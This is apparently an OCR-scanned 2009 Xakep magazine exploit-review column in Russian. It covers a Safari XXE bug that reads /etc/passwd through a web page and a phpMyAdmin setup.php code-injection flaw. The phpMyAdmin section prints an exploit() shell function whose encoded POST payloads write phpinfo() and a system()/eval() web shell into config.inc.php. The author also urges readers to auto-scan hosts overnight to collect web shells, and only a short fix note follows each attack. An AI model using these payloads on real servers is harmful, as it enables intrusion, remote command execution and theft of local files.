НЕСЛУЧАЙНО CUDA ИДЕМ? phpMyAdmin - Xakep Online

обзор
эксплоитов
обзор
эксплоитов
обзор
эксплоитов
>> взлом
Below you should see the content of a local file, stolen by this evil web page.
&ent;
alert(document.body.innerHTML);
Как видишь, лексема «&ent;» хранит в себе содержимое «/etc/passwd»,
который магическим образом отобразится на экране. Если ты счастливый
обладатель Safari, можешь пройти тест на вшивость по ссылкам https://
cevans-app.appspot.com/static/safaristealfilebug.xml (MacOS) и https://
cevans-app.appspot.com/static/safaristealfilebugwin.xml (Windows).
>> SOLUTION
Обновление до Safari 4.x решит все проблемы и устранит угрозы внешних
нападений.
02
PHPMYADMIN (/SCRIPTS/SETUP.PHP)
PHP CODE INJECTION EXPLOIT
>> Brief
Давно нас не баловали хорошими уязвимостями в популярных проектах.
Сегодня я постараюсь это исправить: 4 июня багоискателям удалось обнаружить
изъян в проекте phpMyAdmin, а именно — в генераторе настроечных
файлов «/scripts/setup.php». Суть бага довольно проста: в процессе установки
phpMyAdmin происходит генерация основных параметров (хоста
mysql, логина, пароля, названия базы и т.п.) с последующим их сохранением
в «/config/config.inc.php». Так вот, до недавнего времени разработчики
довольно аккуратно фильтровали нежелательный контент, но в последних
версиях чуть-чуть изменили алгоритм. В итоге, злоумышленник может
передать ядовитые параметры, позволяющие записать произвольный код
в конфигурационный файл. Затем, по обращению к этому конфигу, хакер
получит полноценный Web-шелл. А теперь разберемся, как это происходит
на самом деле. Вместе с прочими параметрами в значение переменной
«host» инжектируется, к примеру, фраза «phpinfo();//localhost». На выходе
получим вполне работоспособный сценарий, выводящий phpinfo().
Помимо прочего, эксплойт позволяет внедрить «passthru()» для передачи
команд Web-шеллу при помощи значения переменной «c».
Но не думай, что все так просто. Эксплойт накладывает некоторые
ограничения на phpMyAdmin. Во-первых, нужно, чтобы администратор
устанавливал проект через мастера, а не вручную. Во-вторых,
необходимо наличие файла «scripts/setup.php», который почему-то
(интересно, почему? :)) любят удалять. В-третьих, директория «config/»
также должна присутствовать, а на файл «config.inc.php» должен
быть установлен атрибут записи. В-четвертых, на машине необходим
работоспособный curl (с его помощью происходит инжектирование
кода). И, наконец, уязвимыми версиями phpMyAdmin являются 2.11.x
до 2.11.9.5 и 3.x до 3.1.3.1 (все релизы достаточно новые и выпускались
до апреля этого года).
Как итог, хакер может без труда написать автосканер phpMyadmin и
эксплуатировать каждый хост. На мой взгляд, вероятность успехи атаки
недалека от 30%, а при таких раскладах одна лишь ночь сканирования
будет приносить взломщику море нелишних Web-шеллов.
>> Exploit
Ниже приводится ключевая функция exploit(), отвечающая за инжект
вредоносного кода.
function exploit {
postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22hos
t%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost
%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connec
t_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22aut
h_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&
eoltype=unix"
postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%2
7%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20
%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/
pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20
%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/
pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:
6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%
3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_
type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=
unix"
НАГЛЯДНАЯ ДЕМОНСТРАЦИЯ УЯЗВИМОСТИ ПОД WINDOWS
ПОСЛЕ ДРАКИ КУЛАКАМИ НЕ МАШУТ :)
XÀÊÅÐ 07 /127/ 09
049